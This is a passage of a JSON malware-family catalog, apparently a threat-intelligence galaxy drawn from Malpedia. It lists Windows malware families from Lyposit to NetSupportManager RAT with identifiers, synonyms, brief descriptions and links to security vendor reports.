"synonyms": [ "Adneukine", "Bomba Locker", "Lucky Locker" ], "type": [] }, "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", "value": "Lyposit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", "https://securelist.com/el-machete/66108/", "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" ], "synonyms": [ "El Machete" ], "type": [] }, "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", "value": "Machete" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", "https://www.arbornetworks.com/blog/asert/mad-max-dga/" ], "synonyms": [], "type": [] }, "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", "value": "MadMax" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala", "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" ], "synonyms": [], "type": [] }, "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", "value": "Magala" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", "https://www.youtube.com/watch?v=lqWJaaofNf4", "http://asec.ahnlab.com/1124" ], "synonyms": [], "type": [] }, "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", "value": "Magniber" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" ], "synonyms": [], "type": [] }, "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", "value": "MajikPos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" ], "synonyms": [], "type": [] }, "uuid": "996e73e9-b093-4987-9992-f52008e55b24", "value": "Makadocs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader", "https://twitter.com/James_inthe_box/status/1046844087469391872" ], "synonyms": [], "type": [] }, "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", "value": "MakLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/", "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/" ], "synonyms": [], "type": [] }, "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", "value": "Maktub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos", "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" ], "synonyms": [], "type": [] }, "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", "value": "MalumPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", "https://securelist.com/the-return-of-mamba-ransomware/79403/", "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/" ], "synonyms": [ "DiskCryptor", "HDDCryptor" ], "type": [] }, "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", "value": "Mamba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt", "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" ], "synonyms": [ "CryptoHost" ], "type": [] }, "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", "value": "ManameCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" ], "synonyms": [ "junidor", "mengkite", "vedratve" ], "type": [] }, "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", "value": "Mangzamel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware", "https://twitter.com/struppigel/status/811587154983981056" ], "synonyms": [], "type": [] }, "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", "value": "Manifestus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", "value": "ManItsMe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", "value": "MAPIget" }, { "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" ], "synonyms": [], "type": [] }, "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", "value": "Marap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker", "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" ], "synonyms": [], "type": [] }, "uuid": "59717468-271e-4d15-859a-130681c17ddb", "value": "Matrix Banker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom", "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf" ], "synonyms": [], "type": [] }, "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", "value": "Matrix Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", "http://www.clearskysec.com/tulip/", "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" ], "synonyms": [], "type": [] }, "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", "value": "Matryoshka RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu", "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" ], "synonyms": [], "type": [] }, "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", "value": "Matsnu" }, { "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html", "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d" ], "synonyms": [ "DexLocker" ], "type": [] }, "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", "value": "MBRlock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", "https://www.symantec.com/connect/blogs/bios-threat-showing-again", "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/", "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/" ], "synonyms": [ "MyBios" ], "type": [] }, "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", "value": "Mebromi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical", "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" ], "synonyms": [], "type": [] }, "uuid": "cd055701-89ad-41be-b4d9-69460876fdee", "value": "MECHANICAL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre", "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" ], "synonyms": [], "type": [] }, "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", "value": "Medre" }, { "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", "https://news.drweb.com/show/?i=10302&lng=en", "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/" ], "synonyms": [], "type": [] }, "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", "value": "Medusa" }, { "description": "Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.merlin", "http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html", "http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html", "https://github.com/Ne0nd0g/merlin" ], "synonyms": [], "type": [] }, "uuid": "427e4b41-adf6-4d4d-a83f-6d96b5ab4a3e", "value": "Merlin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo", "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html", "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html" ], "synonyms": [ "Casbaneiro" ], "type": [] }, "uuid": "18dc3e7a-600d-4e5f-a283-86156b938530", "value": "Metamorfo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" ], "synonyms": [], "type": [] }, "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", "value": "Mewsei" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" ], "synonyms": [], "type": [] }, "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", "value": "Miancha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", "value": "Micrass" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" ], "synonyms": [], "type": [] }, "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", "value": "Microcin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" ], "synonyms": [], "type": [] }, "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", "value": "Micropsia" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" ], "synonyms": [], "type": [] }, "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8", "value": "Mikoponi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", "value": "MILKMAID" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", "https://github.com/gentilkiwi/mimikatz", "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/", " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] }, "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", "value": "MimiKatz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", "value": "MiniASP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" ], "synonyms": [], "type": [] }, "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", "value": "Mirage" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" ], "synonyms": [], "type": [] }, "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", "value": "MirageFox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html", "https://twitter.com/PhysicalDrive0/status/830070569202749440" ], "synonyms": [], "type": [] }, "uuid": "2edd3051-b1b5-47f2-9155-8c97f791dfb7", "value": "Mirai (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat", "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", "value": "Misdat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" ], "synonyms": [ "MixFox", "ModPack" ], "type": [] }, "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", "value": "Misfox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" ], "synonyms": [], "type": [] }, "uuid": "4c786624-4a55-46e6-849d-b65552034235", "value": "Miuref" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core", "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" ], "synonyms": [], "type": [] }, "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", "value": "MM Core" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat", "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" ], "synonyms": [], "type": [] }, "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", "value": "MobiRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" ], "synonyms": [], "type": [] }, "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", "value": "Mocton" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", "https://twitter.com/physicaldrive0/status/670258429202530306" ], "synonyms": [ "straxbot" ], "type": [] }, "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", "value": "ModPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", "https://breakingmalware.com/malware/moker-part-2-capabilities/", "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/", "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network" ], "synonyms": [], "type": [] }, "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", "value": "Moker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" ], "synonyms": [], "type": [] }, "uuid": "3a711d44-2a70-418d-92c1-692c3d3b13c2", "value": "Mokes (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole", "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" ], "synonyms": [], "type": [] }, "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", "value": "Mole" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", "http://www.clearskysec.com/iec/", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" ], "synonyms": [], "type": [] }, "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", "value": "Molerat Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" ], "synonyms": [ "CoinMiner" ], "type": [] }, "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", "value": "Monero Miner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" ], "synonyms": [], "type": [] }, "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", "value": "MoonWind" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine" ], "synonyms": [], "type": [] }, "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", "value": "Morphine" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", "https://www.f-secure.com/weblog/archives/00002227.html", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" ], "synonyms": [], "type": [] }, "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", "value": "Morto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" ], "synonyms": [], "type": [] }, "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", "value": "Mosquito" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" ], "synonyms": [], "type": [] }, "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", "value": "Moure" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" ], "synonyms": [], "type": [] }, "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", "value": "mozart" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [ "MPK" ], "type": [] }, "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", "value": "MPKBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html" ], "synonyms": [], "type": [] }, "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", "value": "Multigrain POS" }, { "description": " a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" ], "synonyms": [], "type": [] }, "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", "value": "murkytop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" ], "synonyms": [], "type": [] }, "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", "value": "Murofet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha", "http://vms.drweb.ru/virus/?_is=1&i=8477920" ], "synonyms": [], "type": [] }, "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", "value": "Mutabaha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" ], "synonyms": [], "type": [] }, "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", "value": "MyKings Spreader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" ], "synonyms": [], "type": [] }, "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", "value": "MyloBot" }, { "description": "Botnet with focus on banks in Latin America and South America.\r\nRelies on DLL Sideloading attacks to execute malicious DLL files.\r\nUses legitimate VMWare executable in attacks. \r\nAs of March 2019, the malware is under active development with updated versions coming out on persistent basis.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware", "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector", "http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html", "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/" ], "synonyms": [], "type": [] }, "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6", "value": "N40" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" ], "synonyms": [], "type": [] }, "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", "value": "Nabucur" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini", "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" ], "synonyms": [], "type": [] }, "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", "value": "Nagini" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", "value": "Naikon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/" ], "synonyms": [], "type": [] }, "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", "value": "Nanocore RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker" ], "synonyms": [], "type": [] }, "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", "value": "NanoLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" ], "synonyms": [], "type": [] }, "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", "value": "Narilam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", "https://www.ncsc.gov.uk/alerts/turla-group-malware" ], "synonyms": [], "type": [] }, "uuid": "d8295eba-60ef-4900-8091-d694180de565", "value": "Nautilus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" ], "synonyms": [], "type": [] }, "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", "value": "NavRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/", "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/" ], "synonyms": [ "nucurs" ], "type": [] }, "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", "value": "Necurs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim", "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" ], "synonyms": [ "Nemain" ], "type": [] }, "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", "value": "Nemim" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5", "value": "NetC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [ "ScoutEagle" ], "type": [] }, "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", "value": "NETEAGLE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger", "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" ], "synonyms": [], "type": [] }, "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", "value": "Netrepser" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", "http://www.netsupportmanager.com/index.asp", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" ], "synonyms": [], "type": [] }, "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", "value": "NetSupportManager RAT" }, { "description": "", "meta": { "refs": [ 